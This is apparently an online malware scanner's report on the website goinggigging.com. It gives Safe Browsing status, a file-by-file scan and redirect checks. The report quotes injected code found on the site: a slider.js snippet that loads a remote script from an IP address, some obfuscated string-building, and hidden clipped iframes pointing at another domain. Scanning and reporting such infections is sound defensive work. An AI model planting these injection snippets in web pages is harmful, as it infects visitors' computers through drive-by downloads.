Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goinggigging.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.goinggigging.com/ | 200 OK Content-Length: 5577 Content-Type: text/html | clean |
http://www.goinggigging.com/js/jquery.min.js | 200 OK Content-Length: 77386 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction( ...[3682 bytes skipped]... Antivirus reports:
| ||
http://www.goinggigging.com/js/slider.js | 200 OK Content-Length: 7161 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1041 bytes skipped]... /> $active = $(this); clearInterval(play); rotate(); rotateSwitch(); return false; }); }); function srcc() { var gec = document.createElement('script'); gec.src = 'http://199.236.123.138/enews/9pfCvYmw.php'; if (!document.getElementById('gec')) { document.write('<div id=\'gec\'></div>'); document.getElementById('gec').appendChild(gec); }}srcc(); funizu="s"+"p"+"li"+"t";hps=window;rgah="dy";sar=document; ...[2150 bytes skipped]... Antivirus reports:
| ||
http://www.goinggigging.com/index.php | 200 OK Content-Length: 5577 Content-Type: text/html | clean |
http://www.goinggigging.com/gigging_reservations.html | 200 OK Content-Length: 4380 Content-Type: text/html | suspicious |
Suspicious code found <style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="n" name="n" style="position:absolute;clip:rect(400px,auto,auto,650px);" src="http://www.clover-catering.com/count.php?id=673329"></iframe> | ||
http://ftp.templekingproductions.com/wp-admin/fce417f8db1508.php?a0bd02b=true&id=87&fid=edc7b14c3f3c29b02899d5f108d1e6a5&type=html | 500 Can't connect to ftp.templekingproductions.com:80 Content-Length: 204 Content-Type: text/plain | clean |
http://ftp.templekingproductions.com/test404page.js | 500 Can't connect to ftp.templekingproductions.com:80 Content-Length: 204 Content-Type: text/plain | clean |
http://www.goinggigging.com/included.html | 200 OK Content-Length: 4301 Content-Type: text/html | suspicious |
Suspicious code found <style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="n" name="n" style="position:absolute;clip:rect(400px,auto,auto,650px);" src="http://www.clover-catering.com/count.php?id=673330"></iframe> | ||
http://ftp.templekingproductions.com/wp-admin/fce417f8db1508.php?a0bd02b=true&id=89&fid=edc7b14c3f3c29b02899d5f108d1e6a5&type=html | 500 Can't connect to ftp.templekingproductions.com:80 Content-Length: 204 Content-Type: text/plain | clean |
http://www.goinggigging.com/reservations.html | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goinggigging.com
Result:
GET / HTTP/1.1
Host: goinggigging.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: goinggigging.com
Referer: http://www.google.com/search?q=goinggigging.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goinggigging.com
Referer: http://www.google.com/search?q=goinggigging.com
Result:
The result is similar to the first query. There are no suspicious redirects found.